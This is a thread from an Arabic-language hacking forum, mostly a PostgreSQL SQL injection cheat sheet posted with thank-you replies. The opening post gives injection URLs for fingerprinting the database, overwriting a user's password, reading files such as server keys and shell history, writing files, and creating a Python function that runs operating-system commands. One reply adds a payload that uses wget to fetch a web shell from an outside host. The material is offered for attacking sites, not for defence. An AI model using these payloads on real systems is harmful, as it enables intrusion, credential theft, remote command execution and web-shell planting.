التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-01-2011, 05:43 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
anti-trust
Your Worst Enemy
 
الصورة الرمزية anti-trust
 

 

 
إحصائية العضو






anti-trust غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
anti-trust is on a distinguished road

افتراضي POSTGRESQL Injection


Identifing PostgreSQL


When a SQL Injection has been found, you need to carefully fingerprint the backend database engine. You can determine
that the backend database engine is POSTGRESQL by using the



:: - cast operator



Examples:

The function version() can be used to grab the POSTGRESQL banner. This will also show the underlying operating system type and version.


Example:

كود:
  http://www.is3curity.com/name.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1- 
 -
  POSTGRESQL  8.6.1 on i486-Linux bt , compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
Blind Injection
For blind SQL Injection attacks, you should take into consideration the following built-in functions:


- String Length : LENGTH(str)


- Extract a substring from a given string: SUBSTR(str,index,offset)


-String representation with no single quotes :
CHR(104)||CHR(101)||CHR(108)||CHR(108)||CHR(111)




Starting from 8.2 POSTGRESQL has introduced a built-in function, pg_sleep(n), to make the current session process sleep for n seconds.


In previous version, you can easily create a custom pg_sleep(n) by using libc:

CREATE function pg_sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' LANGUAGE 'C' STRICT Single Quote unescape

Strings can be encoded, to prevent single quotes escaping, by using chr() function.


* chr(n): Returns the character whose ASCII value corresponds to the number n
* ascii(n): Returns the ASCII value which corresponds to the character n
Let's say you want to encode the string 'root':
select ascii('r')
114
select ascii('o')
111
select ascii('t')
116




We can encode 'root' as:


chr(114)||chr(111)||chr(111)||chr(116)


Example:

كود:
http://www.is3curity.com/name.php?id=1; UPDATE users SET
 PASSWORD=chr(114)||chr(111)||chr(111)||chr(116)--
Attack Vectors

Current User

The identity of the current user can be retrieved with the following SQL SELECT statements:


SELECT user
SELECT current_user
SELECT session_user
SELECT usename FROM pg_user
SELECT getpgusername()


Examples:

كود:
  http://www.is3curity.com/name.php?id=1 UNION ALL SELECT user,NULL,NULL--
كود:
 
     http://www.is3curity.com/name.php?id=1 UNION ALL SELECT current_user, NULL, NULL--
Current Database


The built-in function current_database() returns the current database name.

Example:


كود:
 http://www.is3curity.com/name.php?id=1 UNION ALL SELECT current_database(),NULL,NULL- 
-
Reading from a file:


ProstgreSQL provides two ways to access a local file:


• COPY statement
• pg_read_file() internal function (starting from POSTGRESQL 8.1)


COPY:

name.php?id=1; CREATE TABLE file_store(id serial, data text)--


name.php?id=1; COPY file_store(data) FROM '/var/lib/postgresql/.psql_history'--



Data should be retrieved by performing a UNION Query SQL Injection:


- retrieves number of rows previously added in file_store with COPY statement
- retrieves a row at time with UNION SQL Injection


pg_read_file():


Example:


SELECT pg_read_file('server.key',0,1000);


Writing to a file :


name.php?id=1; COPY file_store(data) TO '/var/lib/postgresql/copy_output'--


executing a shell command redirecting its stdout :


SELECT system('uname -a > /tmp/test')




Create a proxy shell function:


name.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS ‘import os; return os.popen(args[0]).read()’ LANGUAGE plpythonu;--


Run an OS Command:


name.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--






Copyrigh vbspiders.com



POSTGRESQL Injection

   

رد مع اقتباس
قديم 02-01-2011, 09:59 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


مشكور انتي ترست ع الشرح

انا الي بعرفو والمعرفه الكامله لله
انه الحقن تاع
php
ما نقدر نعدل ع قواعد البيانات تاعتو من خلال
set or update
وانت مستخدم داله سستم لكان ممكن ينفع نعمل زي هيك

vbspiders.com/sql.php?id=1; SELECT system('wget http://vbspiders.com/shell.txt -O shell.php') --

ونرفع شل بالراحه

بس هلا الي فهمتو من كلامك انه ممكن نعدل ع القواعد الي بتكون
POSTGRESQL

وبنفحصها بالامر هاد
name.php?id=1 AND 1::int=1

او من
version()
ويطلع لنا بالناتج
انو السكول من نوع
PostgreSQL

اتمنا تصححنا لو في شيء غلط

وسلمت كثير ع الشرح
بوركت حبيبي

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 02-01-2011, 10:06 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية NeTCaT-Ma
 

 

 
إحصائية العضو








NeTCaT-Ma غير متواجد حالياً

إرسال رسالة عبر MSN إلى NeTCaT-Ma

 

 

إحصائية الترشيح

عدد النقاط : 10
NeTCaT-Ma is on a distinguished road

افتراضي


شكرا لكم إخواني كلكم فائدة

التوقيع

mode : off
I Will Be Back Soon
القرآن الكريم

 

   

رد مع اقتباس
قديم 02-01-2011, 11:25 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية speeedh
 

 

 
إحصائية العضو






speeedh غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
speeedh is on a distinguished road

افتراضي


لون الخط سببلي صداع ....بارك الله فيك على الشرح.

التوقيع

http://img21.xooimage.com/files/9/7/...st-16c600a.jpg

 

   

رد مع اقتباس
قديم 02-02-2011, 04:40 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
anti-trust
Your Worst Enemy
 
الصورة الرمزية anti-trust
 

 

 
إحصائية العضو






anti-trust غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
anti-trust is on a distinguished road

افتراضي


[align=right]اها فوفو الان

كود:
 
كود:
 SELECT system('uname -a > /tmp/test')
هي في البي اتش بي زي ما تفضلت حظرتك وانا الي فهمتوا من سؤالك هي سيستم فقط في حال كوماند

كما ديمو 1 سيستم فقط لطلب كوماند معين


في حال

كود:
echo system[""]
لكن الطريقة مختلفه جدا بقواعد Postgresql تم طرح هذا النوع من الحقن فقط مقابل نوع من الويب

ابلكيشن فقط في موديل 38 حسب الاوبريتشن سيستم الي حنستعملوا مش شايف فيها شي معقد اصلا


هي فقط
:: - cast operator

كود:
::
[/align]



   

رد مع اقتباس
قديم 02-04-2011, 09:48 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية head-shot
 

 

 
إحصائية العضو





head-shot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
head-shot is on a distinguished road

افتراضي


بارك الله فيك على الشرح.

   

رد مع اقتباس
قديم 09-17-2011, 08:54 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية ahmedsarhan
 

 

 
إحصائية العضو






ahmedsarhan غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ahmedsarhan is on a distinguished road

افتراضي رد: POSTGRESQL Injection


شكرا يا عم ..... ما هو مش هنخلص

   

رد مع اقتباس
قديم 10-20-2014, 01:30 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو







syrian thunder غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
syrian thunder is on a distinguished road

افتراضي رد: POSTGRESQL Injection


nice

   

رد مع اقتباس
قديم 09-03-2016, 05:32 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية elictrojan
 

 

 
إحصائية العضو







elictrojan غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
elictrojan is on a distinguished road

افتراضي رد: POSTGRESQL Injection


التتتتتتتتتتتتتتتتتتتتتتتتتتتتتتتتت

   

رد مع اقتباس
قديم 12-09-2016, 12:22 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية sergeanx
 

 

 
إحصائية العضو







sergeanx غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
sergeanx is on a distinguished road

افتراضي رد: POSTGRESQL Injection


يععععععععععععطيك ألعافية على الطرح ألرائع

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:30 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0